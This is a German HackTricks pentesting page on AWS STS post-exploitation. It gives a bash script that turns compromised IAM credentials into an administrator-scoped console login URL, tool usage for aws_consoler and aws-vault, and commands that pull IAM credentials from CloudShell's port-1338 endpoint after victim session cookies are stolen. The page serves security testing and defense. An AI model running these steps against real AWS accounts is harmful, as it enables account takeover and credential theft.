AWS - STS Post Exploitation

Unterstütze HackTricks

STS

Für weitere Informationen:

AWS - IAM, Identity Center & SSO Enum

Von IAM-Creds zur Konsole

Wenn du es geschafft hast, einige IAM-Anmeldeinformationen zu erhalten, könntest du daran interessiert sein, auf die Webkonsole zuzugreifen. Verwende dazu die folgenden Tools. Beachte, dass der Benutzer/die Rolle die Berechtigung sts:GetFederationToken haben muss.

Benutzerdefiniertes Skript

Das folgende Skript verwendet das Standardprofil und einen Standard-AWS-Standort (nicht gov und nicht cn), um dir eine signierte URL zu geben, die du zum Einloggen in die Webkonsole verwenden kannst:

# Get federated creds (you must indicate a policy or they won't have any perms)
## Even if you don't have Admin access you can indicate that policy to make sure you get all your privileges
## Don't forget to use [--profile <prof_name>] in the first line if you need to
output=$(aws sts get-federation-token --name consoler --policy-arns arn=arn:aws:iam::aws:policy/AdministratorAccess)

if [ $? -ne 0 ]; then
echo "The command 'aws sts get-federation-token --name consoler' failed with exit status $status"
exit $status
fi

# Parse the output
session_id=$(echo $output | jq -r '.Credentials.AccessKeyId')
session_key=$(echo $output | jq -r '.Credentials.SecretAccessKey')
session_token=$(echo $output | jq -r '.Credentials.SessionToken')

# Construct the JSON credentials string
json_creds=$(echo -n "{\"sessionId\":\"$session_id\",\"sessionKey\":\"$session_key\",\"sessionToken\":\"$session_token\"}")

# Define the AWS federation endpoint
federation_endpoint="https://signin.aws.amazon.com/federation"

# Make the HTTP request to get the sign-in token
resp=$(curl -s "$federation_endpoint" \
--get \
--data-urlencode "Action=getSigninToken" \
--data-urlencode "SessionDuration=43200" \
--data-urlencode "Session=$json_creds"
)
signin_token=$(echo -n $resp | jq -r '.SigninToken' | tr -d '\n' | jq -sRr @uri)



# Give the URL to login
echo -n "https://signin.aws.amazon.com/federation?Action=login&Issuer=example.com&Destination=https%3A%2F%2Fconsole.aws.amazon.com%2F&SigninToken=$signin_token"

aws_consoler

Du kannst einen Web-Konsolen-Link generieren mit https://github.com/NetSPI/aws_consoler.

cd /tmp
python3 -m venv env
source ./env/bin/activate
pip install aws-consoler
aws_consoler [params...] #This will generate a link to login into the console

Stellen Sie sicher, dass der IAM-Benutzer die Berechtigung sts:GetFederationToken hat oder eine Rolle zum Übernehmen bereitstellt.

aws-vault

aws-vault ist ein Tool, um AWS-Anmeldeinformationen sicher in einer Entwicklungsumgebung zu speichern und darauf zuzugreifen.

aws-vault list
aws-vault exec jonsmith -- aws s3 ls # Execute aws cli with jonsmith creds
aws-vault login jonsmith # Open a browser logged as jonsmith

Du kannst auch aws-vault verwenden, um eine Browser-Konsolensitzung zu erhalten.

Von Konsole zu IAM-Creds

Ursprünglich in diesem Beitrag entdeckt, wenn du es schaffst, Zugriff auf eine Webkonsole zu kompromittieren (vielleicht hast du Cookies gestohlen und konntest nicht auf den .aws-Ordner zugreifen), kannst du einige IAM-Token-Anmeldeinformationen für diesen Benutzer über CloudShell erhalten.

CloudShell stellt IAM-Anmeldeinformationen über einen undokumentierten Endpunkt auf Port 1338 bereit. Nachdem du Sitzungscookies des Opfers in deinen Browser geladen hast, kannst du zu CloudShell navigieren und die folgenden Befehle ausführen, um IAM-Anmeldeinformationen zu erhalten.

TOKEN=$(curl -X PUT localhost:1338/latest/api/token -H "X-aws-ec2-metadata-token-ttl-seconds: 60")
curl localhost:1338/latest/meta-data/container/security-credentials -H "X-aws-ec2-metadata-token: $TOKEN"
Unterstütze HackTricks

Last updated